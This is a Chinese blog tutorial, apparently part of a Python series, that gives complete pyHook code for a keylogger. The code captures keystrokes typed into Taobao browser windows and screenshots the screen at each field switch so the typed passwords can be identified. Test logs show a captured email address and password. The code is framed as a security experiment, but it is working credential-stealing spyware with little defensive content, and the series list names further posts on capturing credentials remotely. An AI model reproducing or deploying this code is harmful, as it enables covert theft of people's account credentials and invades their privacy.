在上一篇文章[《Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性》](http://blog.csdn.net/dyx1024/article/details/7314275)中,通过日志记录了一些可能是用户输入的用户名或密码等信息,但如果用户在网站上输入的是其他信息,我们从中区分出敏感信息还是要花费时间来分析的,刚才想了想,将功能优化了一下。
### 一、思路:
1、在抓取到用户输入的信息后,除了记录到日志中外,再给当前屏幕截一张图,以日期命名;
2、通过对于图片名与日志中ERROR级别对应的时间点,就可以判断内容是不是敏感信息;
3、之所以采用抓图和日志结合的方法,是因为密码在界面上不会显示出来,图片中看不到,必须结合日志,呵呵。
### 二、实现:
~~~
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pythoncom
import pyHook
import time
import logging
import logging.config
from PIL import ImageGrab
#日志配置文件名
LOG_FILENAME = 'hook_logging.conf'
#日志语句提示信息
LOG_CONTENT_NAME = 'taobao_input_msg'
def log_init(log_config_filename, logname):
'''
Function:日志模块初始化函数
Input:log_config_filename:日志配置文件名
lognmae:每条日志前的提示语句
Output: logger
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-02-13
'''
logging.config.fileConfig(log_config_filename)
logger = logging.getLogger(logname)
return logger
def onMouseEvent(event):
'''
Function:处理鼠标左键单击事件,如果当前MSG中存放了信息,
将其写入文件,因为有的用户在输入 完用户名后,不是使用TAB键切换到密码
框,而是通过鼠标切换到密码输入窗口这种情况应该属于大多数网民的习惯,
所以此处要判断是否通过鼠标切换了输入窗口
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
'''
global MSG
if len(MSG) != 0:
hook_logger.info('current page:%s' % event.WindowName)
hook_logger.error('information:%s' % MSG)
MSG = ''
#屏幕抓图实现
pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
pic = ImageGrab.grab()
pic.save('%s.png' % pic_name)
#保存成为以日期命名的图片
return True
def onKeyboardEvent(event):
"处理键盘事件"
'''
Function:处理键盘事件,如果当前窗口为TAOBAO页面,刚开始监控并记录用户输入
因为此时用户可能准备输入用户名及密码进行登陆,所以将用户输入的所有可见
的ascii字符记录下来,此处要考虑用户是否使用了TAB键或回车键来
结束输入,此时要将信息记录到日志中。
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
'''
global MSG
if event.WindowName.decode('GBK').find(u"淘宝") != -1:
if (127 >= event.Ascii > 31) or (event.Ascii == 8):
MSG += chr(event.Ascii)
hook_logger.info('ascii:%d(%s)' % (event.Ascii, str(event.Key)))
if (event.Ascii == 9) or (event.Ascii == 13):
hook_logger.info('current page:%s' % event.WindowName)
hook_logger.error('information:%s' % MSG)
MSG = ''
#屏幕抓图实现
pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
pic = ImageGrab.grab()
#保存成为以日期命名的图片
pic.save('%s.png' % pic_name)
return True
if __name__ == "__main__":
'''
Function:获取TAOBAO账号及密码,增加抓图功能
Input:NONE
Output: NONE
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
'''
#打开日志文件
#初始化日志系统
hook_logger = log_init(LOG_FILENAME, LOG_CONTENT_NAME)
MSG = ''
#创建hook句柄
hm = pyHook.HookManager()
#监控鼠标
hm.SubscribeMouseLeftDown(onMouseEvent)
hm.HookMouse()
#监控键盘
hm.KeyDown = onKeyboardEvent
hm.HookKeyboard()
#循环获取消息
pythoncom.PumpMessages()
~~~
### 三、测试:
1、记录下来的日志内容:
~~~
[2012-03-03 13:03:52,530 taobao_input_msg]INFO: ascii:105(I)
[2012-03-03 13:03:53,342 taobao_input_msg]INFO: ascii:112(P)
[2012-03-03 13:03:53,640 taobao_input_msg]INFO: ascii:104(H)
[2012-03-03 13:03:54,608 taobao_input_msg]INFO: ascii:111(O)
[2012-03-03 13:04:01,655 taobao_input_msg]INFO: ascii:110(N)
[2012-03-03 13:04:01,921 taobao_input_msg]INFO: ascii:101(E)
[2012-03-03 13:04:03,937 taobao_input_msg]INFO: ascii:52(4)
[2012-03-03 13:04:04,358 taobao_input_msg]INFO: ascii:115(S)
[2012-03-03 13:04:08,640 taobao_input_msg]INFO: current page:淘宝网 - 淘!我喜欢 - Google Chrome
[2012-03-03 13:04:08,640 taobao_input_msg]ERROR: information:iphone4s
[2012-03-03 13:04:27,187 taobao_input_msg]INFO: ascii:115(S)
[2012-03-03 13:04:27,655 taobao_input_msg]INFO: ascii:111(O)
[2012-03-03 13:04:28,217 taobao_input_msg]INFO: ascii:99(C)
[2012-03-03 13:04:28,921 taobao_input_msg]INFO: ascii:114(R)
[2012-03-03 13:04:29,155 taobao_input_msg]INFO: ascii:97(A)
[2012-03-03 13:04:29,733 taobao_input_msg]INFO: ascii:116(T)
[2012-03-03 13:04:29,983 taobao_input_msg]INFO: ascii:101(E)
[2012-03-03 13:04:30,280 taobao_input_msg]INFO: ascii:115(S)
[2012-03-03 13:04:31,828 taobao_input_msg]INFO: ascii:64(2)
[2012-03-03 13:04:33,515 taobao_input_msg]INFO: ascii:103(G)
[2012-03-03 13:04:34,187 taobao_input_msg]INFO: ascii:109(M)
[2012-03-03 13:04:34,265 taobao_input_msg]INFO: ascii:97(A)
[2012-03-03 13:04:34,421 taobao_input_msg]INFO: ascii:105(I)
[2012-03-03 13:04:34,592 taobao_input_msg]INFO: ascii:108(L)
[2012-03-03 13:04:35,030 taobao_input_msg]INFO: ascii:46(Oem_Period)
[2012-03-03 13:04:35,217 taobao_input_msg]INFO: ascii:99(C)
[2012-03-03 13:04:35,342 taobao_input_msg]INFO: ascii:111(O)
[2012-03-03 13:04:35,515 taobao_input_msg]INFO: ascii:109(M)
[2012-03-03 13:04:37,812 taobao_input_msg]INFO: current page:None
[2012-03-03 13:04:37,812 taobao_input_msg]ERROR: information:socrates@gmail.com
[2012-03-03 13:04:43,905 taobao_input_msg]INFO: ascii:57(9)
[2012-03-03 13:04:44,171 taobao_input_msg]INFO: ascii:56(8)
[2012-03-03 13:04:44,467 taobao_input_msg]INFO: ascii:55(7)
[2012-03-03 13:04:44,780 taobao_input_msg]INFO: ascii:54(6)
[2012-03-03 13:04:45,108 taobao_input_msg]INFO: ascii:53(5)
[2012-03-03 13:04:45,437 taobao_input_msg]INFO: ascii:52(4)
[2012-03-03 13:04:45,796 taobao_input_msg]INFO: ascii:51(3)
[2012-03-03 13:04:46,437 taobao_input_msg]INFO: ascii:50(2)
[2012-03-03 13:04:47,046 taobao_input_msg]INFO: ascii:49(1)
[2012-03-03 13:04:52,375 taobao_input_msg]INFO: ascii:113(Q)
[2012-03-03 13:04:52,765 taobao_input_msg]INFO: ascii:119(W)
[2012-03-03 13:04:53,030 taobao_input_msg]INFO: ascii:101(E)
[2012-03-03 13:04:53,328 taobao_input_msg]INFO: ascii:114(R)
[2012-03-03 13:04:53,687 taobao_input_msg]INFO: ascii:116(T)
[2012-03-03 13:04:56,640 taobao_input_msg]INFO: current page:None
[2012-03-03 13:04:56,640 taobao_input_msg]ERROR: information:987654321qwert
[2012-03-03 13:04:57,703 taobao_input_msg]INFO: ascii:106(J)
[2012-03-03 13:04:58,155 taobao_input_msg]INFO: ascii:116(T)
[2012-03-03 13:04:59,125 taobao_input_msg]INFO: ascii:54(6)
[2012-03-03 13:05:00,328 taobao_input_msg]INFO: ascii:121(Y)
[2012-03-03 13:05:02,578 taobao_input_msg]INFO: current page:None
[2012-03-03 13:05:02,578 taobao_input_msg]ERROR: information:jt6y
~~~
2、过滤出ERROR级别日志信息,如下:
~~~
[2012-03-03 13:04:08,640 taobao_input_msg]ERROR: information:iphone4s
[2012-03-03 13:04:37,812 taobao_input_msg]ERROR: information:socrates@gmail.com
[2012-03-03 13:04:56,640 taobao_input_msg]ERROR: information:987654321qwert
[2012-03-03 13:05:02,578 taobao_input_msg]ERROR: information:jt6y
~~~
3、查看生成的图片:
![](https://box.kancloud.cn/2016-06-08_57579357a9410.gif)
可以看出,图片名称中的时间和日志中的时间一一对应,这样就可查看每条日志打印时当前屏幕的状态。
具体看一下每条日志对应的图片:
a. [2012-03-03 13:04:08,640 taobao_input_msg]ERROR: information:iphone4s
![](https://box.kancloud.cn/2016-06-08_57579357cb196.gif)
b. [2012-03-03 13:04:37,812 taobao_input_msg]ERROR: information:socrates@gmail.com
![](https://box.kancloud.cn/2016-06-08_57579357e9c64.gif)
c. [2012-03-03 13:04:56,640 taobao_input_msg]ERROR: information:987654321qwert (原来这行才是密码)
![](https://box.kancloud.cn/2016-06-08_5757935811d55.gif)
d [2012-03-03 13:05:02,578 taobao_input_msg]ERROR: information:jt6y
![](https://box.kancloud.cn/2016-06-08_575793582dd28.gif)
- 前言
- Python:实现文件归档
- Pyhon:按行输出文件内容
- Python:读文件和写文件
- Python:实现一个小算法
- Python:通过命令行发送新浪微博
- Python:通过摄像头实现的监控功能
- Python:通过摄像头抓取图像并自动上传至新浪微博
- Python:简单的摄像头程序实现
- Python:日志模块logging的应用
- Python:操作嵌入式数据库SQLite
- Python:将句子中的单词全部倒排过来,但单词的字母顺序不变
- Python:语音处理,实现在线朗读RFC文档或本地文本文件
- Python:通过计算阶乘来学习lambda和reduce这两个函数的使用
- Python:通过执行100万次打印来比较C和python的性能,以及用C和python结合来解决性能问题的方法
- Python:使用matplotlib绘制图表
- Python:使用pycha快速绘制办公常用图(饼图、垂直直方图、水平直方图、散点图等七种图形)
- Python:使用pycha快速绘制办公常用图二(使用样式定制个性化图表)
- Python:监控键盘输入、鼠标操作,并将捕获到的信息记录到文件中
- Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性
- Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性(二)
- Python:通过远程监控用户输入来获取淘宝账号和密码的实验(一)
- Python:通过远程监控用户输入来获取淘宝账号和密码的实验(二)
- Python:通过自定义系统级快捷键来控制程序运行
- Python:通过自定义系统级快捷键来控制程序开始或停止记录日志(使用小技巧解决一个貌似无解的问题)
- Python:一个多功能的抓图工具开发(附源码)
- Python:程序发布方式简介一(打包为可执行文件EXE)
- Python:新浪微博应用开发简介(认证及授权部分)
- Python:程序最小化到托盘功能实现
- Python:实用抓图工具开发介绍(含需求分析、设计、编码、单元测试、打包、系统测试、发布各环节)
- Python:桌面气泡提示功能实现
- Python:未来三个月的python学习计划
- Python:pygame模块及SDL库简介
- Python:获取新浪微博用户的收听列表和粉丝列表
- Python:pygame游戏编程之旅一(Hello World)
- Python:pygame游戏编程之旅二(自由移动的小球)
- Python:pygame游戏编程之旅三(玩家控制的小球)
- Python:pygame游戏编程之旅四(游戏界面文字处理)
- Python:pygame游戏编程之旅五(游戏界面文字处理详解)
- Python:pygame游戏编程之旅六(游戏中的声音处理)
- Python:pygame游戏编程之旅七(pygame基础知识讲解1)
- Python:编程“八荣八耻”之我见
- Python:脚本的几种执行方式
- wxPython:简单的wxPython程序
- wxPython:简单的wxPython程序的另一种写法
- wxPython:应用程序对象介绍
- wxPython:输出重定向
- wxPython:关闭wxPython程序
- wxPython:Frame类介绍
- wxPython:面板Panel的使用
- wxPython:工具栏、状态栏、菜单实现
- wxPython:消息对话框MessageDialog
- wxPython:文本对话框TextEntryDialog
- wxPython:列表选择框SingleChoiceDialog
- wxPython:事件处理介绍一
- wxPython:事件处理介绍二
- wxPython: 简单的绘图例子
- wxPython:状态栏介绍
- wxPython:菜单介绍
- wxPython:文件对话框wx.FileDialog
- wxPython:颜色选择对话框wx.ColourDialog
- wxPython:布局管理器sizer介绍
- wxPython:启动画面SplashScreen介绍
- wxPython:绘画按钮BitmapButton介绍
- wxPython:进度条Gauge介绍
- Python: 发送新浪微博(使用oauth2)
- Python:读取新浪微博收听列表
- Python:DNS客户端实现